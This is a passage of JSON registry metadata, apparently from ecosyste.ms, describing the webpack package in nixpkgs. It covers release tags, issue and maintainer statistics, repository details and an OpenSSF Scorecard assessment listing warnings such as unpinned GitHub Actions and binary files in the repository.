itHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T16:59:44.186Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":0.08523020765177865,"forks_count":0.11105754330383277,"docker_downloads_count":null,"average":0.04907193773890285},"purl":"pkg:nix/nodePackages.webpack?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/nodePackages.webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/nodePackages.webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-21T17:00:12.153Z","issues_count":10162,"pull_requests_count":9386,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2758812.4810541794,"issues_closed_count":9895,"pull_requests_closed_count":8841,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834382995473332,"avg_comments_per_pull_request":3.1543788621350948,"merged_pull_requests_count":5983,"bot_issues_count":8,"bot_pull_requests_count":2907,"past_year_issues_count":80,"past_year_pull_requests_count":896,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":359731.32045779686,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":699,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.3625,"past_year_avg_comments_per_pull_request":4.657366071428571,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":136,"past_year_merged_pull_requests_count":550,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1051,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":122,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"}],"active_maintainers":[{"login":"alexander-akait","count":411,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":81,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":55,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":41,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages.webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages.webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages.webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages.webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages.webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/nodePackages.webpack/codemeta","maintainers":[],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":3599},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-09-02T05:03:05.616Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":13184731,"name":"nodePackages_latest.webpack","ecosystem":"nixpkgs","description":"Packs ECMAScript/CommonJs/AMD modules for the browser. Allows you to split your codebase into multiple bundles, which can be loaded on demand. Supports loaders to preprocess files, i.e. json, jsx, es7, css, less, ... and your custom stuff.","homepage":"https://github.com/webpack/webpack","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/webpack/webpack","keywords_array":[],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-01T23:50:33.759Z","latest_release_published_at":"2026-02-01T23:50:33.759Z","latest_release_number":"5.90.3","last_synced_at":"2026-03-06T23:01:02.432Z","created_at":"2026-02-01T23:50:28.377Z","updated_at":"2026-08-23T01:47:50.369Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=nodePackages_latest.webpack","install_command":"nix-env -iA nixpkgs.nodePackages_latest.webpack","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/node-packages/node-packages.nix#L97195","metadata":{"nix_attribute":"webpack-5.90.3","position":"pkgs/development/node-packages/node-packages.nix:97195","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin"],"broken":false,"insecure":false,"unfree":false,"outputs":["out"],"upstream_ecosystem":"npm","upstream_name":"webpack","upstream_purl":"pkg:npm/webpack"},"repo_metadata":{"id":2686067,"uuid":"3678731","full_name":"webpack/webpack","owner":"webpack","description":"A bundler for javascript and friends. Packs many modules into a few bundled assets. Code Splitting allows for loading parts of the application on demand. Through \"loaders\", modules can be CommonJs, AMD, ES6 modules, CSS, Images, JSON, Coffeescript, LESS, ... and your custom stuff.","archived":false,"fork":false,"pushed_at":"2026-08-22T00:09:57.000Z","size":95341,"stargazers_count":65973,"open_issues_count":138,"forks_count":9525,"subscribers_count":1466,"default_branch":"main","last_synced_at":"2026-08-22T13:33:37.681Z","etag":null,"topics":["amd","build-tool","commonjs","compiler","es2015","es6","esm","javascript","javascript-compiler","javascript-modules","loaders","module-bundler","plugins","web","web-performance","webpack"],"latest_commit_sha":null,"homepage":"https://webpack.js.org","language":"JavaScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/webpack.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":"GOVERNANCE.md","roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":null,"dco":null,"cla":null,"disclosure":null},"funding":{"open_collective":"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using 